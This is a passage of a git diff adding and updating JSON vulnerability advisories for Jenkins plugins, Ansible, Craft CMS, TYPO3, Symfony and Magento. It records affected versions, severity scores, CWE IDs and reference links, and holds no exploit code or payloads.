"https://jenkins.io/security/advisory/2017-12-06/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:38:21Z", + "nvd_published_at": "2018-01-24T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json b/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json new file mode 100644 index 0000000000000..4ecaf173de8c8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqq5-c89p-3wc3", + "modified": "2024-01-30T23:56:00Z", + "published": "2022-05-17T19:57:30Z", + "aliases": [ + "CVE-2014-4966" + ], + "summary": "Ansible Arbitrary Code Execution", + "details": "Ansible before 1.6.7 does not prevent inventory data with \"{{\" and \"lookup\" substrings, and does not prevent remote data with \"{{\" substrings, which allows remote attackers to execute arbitrary code via (1) crafted lookup('pipe') calls or (2) crafted Jinja2 data.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.6.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4966" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" + }, + { + "type": "WEB", + "url": "http://www.ocert.org/advisories/ocert-2014-004.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:56:00Z", + "nvd_published_at": "2020-02-18T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json b/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json new file mode 100644 index 0000000000000..00434739d1ff2 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrr5-p265-7252", + "modified": "2024-01-30T21:27:43Z", + "published": "2022-05-24T22:00:03Z", + "aliases": [ + "CVE-2019-10325" + ], + "summary": "Jenkins Warnings NG Plugin Cross-site scripting vulnerability", + "details": "A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attacker with Job/Configure permission to inject arbitrary JavaScript in build overview pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:warnings-ng" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.0.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10325" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/warnings-ng-plugin/blob/main/CHANGELOG.md#510---2019-5-31" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1373" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/108540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:27:43Z", + "nvd_published_at": "2019-05-31T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json b/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json index 5d135c0756681..4a1ae2af68bce 100644 --- a/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json +++ b/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json @@ -139,6 +139,10 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework/issues/8814" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-5715.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-framework" diff --git a/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json b/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json index eb2546d9a4652..bf3066bc6b582 100644 --- a/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json +++ b/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wvj5-r78r-hhfq", - "modified": "2023-07-31T18:26:03Z", + "modified": "2024-02-08T19:24:05Z", "published": "2022-05-14T03:10:21Z", "aliases": [ "CVE-2016-2403" @@ -15,6 +15,82 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.0.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.0.6" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,7 +101,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.8.0" }, { "fixed": "2.8.6" @@ -44,7 +120,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0" + "introduced": "3.0.0" }, { "fixed": "3.0.6" @@ -59,6 +135,22 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2403" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2016-2403.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2016-2403.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2016-2403.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2016-2403" + }, { "type": "WEB", "url": "https://web.archive.org/web/20210123224944/http://www.securityfocus.com/bid/96137" diff --git a/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json b/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json new file mode 100644 index 0000000000000..ef66859baee89 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvr4-w6cw-4px8", + "modified": "2024-02-01T21:27:09Z", + "published": "2022-05-24T16:59:48Z", + "aliases": [ + "CVE-2019-15929" + ], + "summary": "Craft CMS possibility of brute force attempts", + "details": "In Craft CMS before 3.1.7, the elevated session password prompt was not being rate limited like normal login forms, leading to the possibility of a brute force attempt on them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15929" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/blob/3.1.7/CHANGELOG-v3.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:27:09Z", + "nvd_published_at": "2019-10-24T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json b/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json new file mode 100644 index 0000000000000..50330a4d214bc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwrr-4jp4-58wg", + "modified": "2024-01-30T21:11:17Z", + "published": "2022-05-24T17:03:48Z", + "aliases": [ + "CVE-2019-16569" + ], + "summary": "CSRF vulnerability in Jenkins Mantis Plugin ", + "details": "A cross-site request forgery vulnerability in Jenkins Mantis Plugin 0.26 and earlier allows attackers to connect to an attacker-specified web server using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mantis" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.26" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16569" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1603" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:11:06Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json b/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json new file mode 100644 index 0000000000000..44fb62dc91bcb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-wxj2-qc9p-65r3/GHSA-wxj2-qc9p-65r3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxj2-qc9p-65r3", + "modified": "2024-01-30T22:27:01Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003026" + ], + "summary": "Jenkins Mattermost Notification Plugin vulnerable to SSRF", + "details": "A server-side request forgery vulnerability exists in Jenkins Mattermost Notification Plugin 2.6.2 and earlier in MattermostNotifier.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified Mattermost server and room and send a message.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:mattermost" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.6.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003026" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-985" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:27:01Z", + "nvd_published_at": "2019-02-20T21:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json b/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json index f51ed21237738..5d47d611c3b70 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json +++ b/advisories/github-reviewed/2022/05/GHSA-x3cf-w64x-4cp2/GHSA-x3cf-w64x-4cp2.json @@ -128,6 +128,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.50" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.49" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.4.20" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.1" + } + ] + } + ] } ], "references": [ @@ -139,6 +253,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b65e6f1a47b68f2713b60cdac9cc3a4af62a2d1c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/form/CVE-2018-19789.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-19789.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -167,6 +289,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-19789-disclosure-of-uploaded-files-full-path" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-19789" + }, { "type": "WEB", "url": "https://web.archive.org/web/20210124224817/http://www.securityfocus.com/bid/106249" diff --git a/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json b/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json index ebd459fccf9ff..d928dff6ecb1d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json +++ b/advisories/github-reviewed/2022/05/GHSA-x5q5-6wvf-2fpq/GHSA-x5q5-6wvf-2fpq.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8124" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8124.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json b/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json new file mode 100644 index 0000000000000..c79315f7806e5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-x654-4wjh-74q6/GHSA-x654-4wjh-74q6.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x654-4wjh-74q6", + "modified": "2024-01-30T22:46:58Z", + "published": "2022-05-13T01:36:51Z", + "aliases": [ + "CVE-2017-2648" + ], + "summary": "Jenkins SSH Build Agents Plugin did not verify host keys", + "details": "It was found that jenkins-ssh-slaves-plugin before version 1.15 did not perform host key verification, thereby enabling Man-in-the-Middle attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:ssh-slaves" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2648" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2648" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-03-20/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/96985" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:58Z", + "nvd_published_at": "2018-07-27T20:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json b/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json index 9289e3b06e443..e02ef83ea1f4e 100644 --- a/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json +++ b/advisories/github-reviewed/2022/05/GHSA-x72m-p4qc-p7rv/GHSA-x72m-p4qc-p7rv.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8109" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8109.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json b/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json new file mode 100644 index 0000000000000..8ad5babc943cf --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-x7qf-qh3r-mx22/GHSA-x7qf-qh3r-mx22.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7qf-qh3r-mx22", + "modified": "2024-01-30T22:36:41Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000010" + ], + "summary": "XXE vulnerability in Jenkins DRY Plugin", + "details": "Jenkins DRY Plugin 2.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:dry" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.50" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.49" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000010" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:41Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json b/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json new file mode 100644 index 0000000000000..7fee524ab01a4 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xgc2-q928-27wv/GHSA-xgc2-q928-27wv.json @@ -0,0 +1,140 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgc2-q928-27wv", + "modified": "2024-02-07T23:31:04Z", + "published": "2022-05-17T01:55:53Z", + "aliases": [ + "CVE-2010-5104" + ], + "summary": "TYPO3 Sensitive Information Disclosure via escapeStrForLike method", + "details": "The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5104" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/9eb4be4ccf10e6959699b9cce375d48697f06cba" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/e8c32474a5571336681243465f42090cf056054f" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/fcabd2fc2aa557c94805f7505277185c4abb68ab" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64185" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101219052359/http://secunia.com/advisories/35770" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111025222220/http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20111223211753/http://www.securityfocus.com/bid/45470" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T23:31:03Z", + "nvd_published_at": "2012-05-21T20:55:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json b/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json index 700be00405dfb..1b034187e388a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json +++ b/advisories/github-reviewed/2022/05/GHSA-xgcp-59g2-wm8g/GHSA-xgcp-59g2-wm8g.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8136" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8136.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json b/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json new file mode 100644 index 0000000000000..0c5e1cccd28d7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgmh-rvpw-6498", + "modified": "2024-01-30T23:18:27Z", + "published": "2022-05-14T03:33:40Z", + "aliases": [ + "CVE-2018-1000108" + ], + "summary": "Reflected cross-site-scripting vulnerability in report URL of Jenkins CppNCSS Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins CppNCSS Plugin 1.1 and earlier in AbstractProjectAction/index.jelly that allow an attacker to craft links to Jenkins URLs that run arbitrary JavaScript in the user's browser when accessed.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:cppncss" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000108" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-712" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:27Z", + "nvd_published_at": "2018-03-13T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json b/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json new file mode 100644 index 0000000000000..a3d5c3766bf44 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj4w-r6gr-x5qm", + "modified": "2024-01-30T21:19:03Z", + "published": "2022-05-24T22:00:44Z", + "aliases": [ + "CVE-2019-10407" + ], + "summary": "Project Inheritance Plugin showed secret environment variables defined in Mask Passwords Plugin ", + "details": "Jenkins Project Inheritance Plugin 19.08.02 and earlier displayed a list of environment variables passed to a build without masking sensitive variables contributed by the Mask Passwords Plugin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:project-inheritance" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.08.02" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 19.08.01" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10407" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-351" + }, + { + "type": "WEB", + "url": 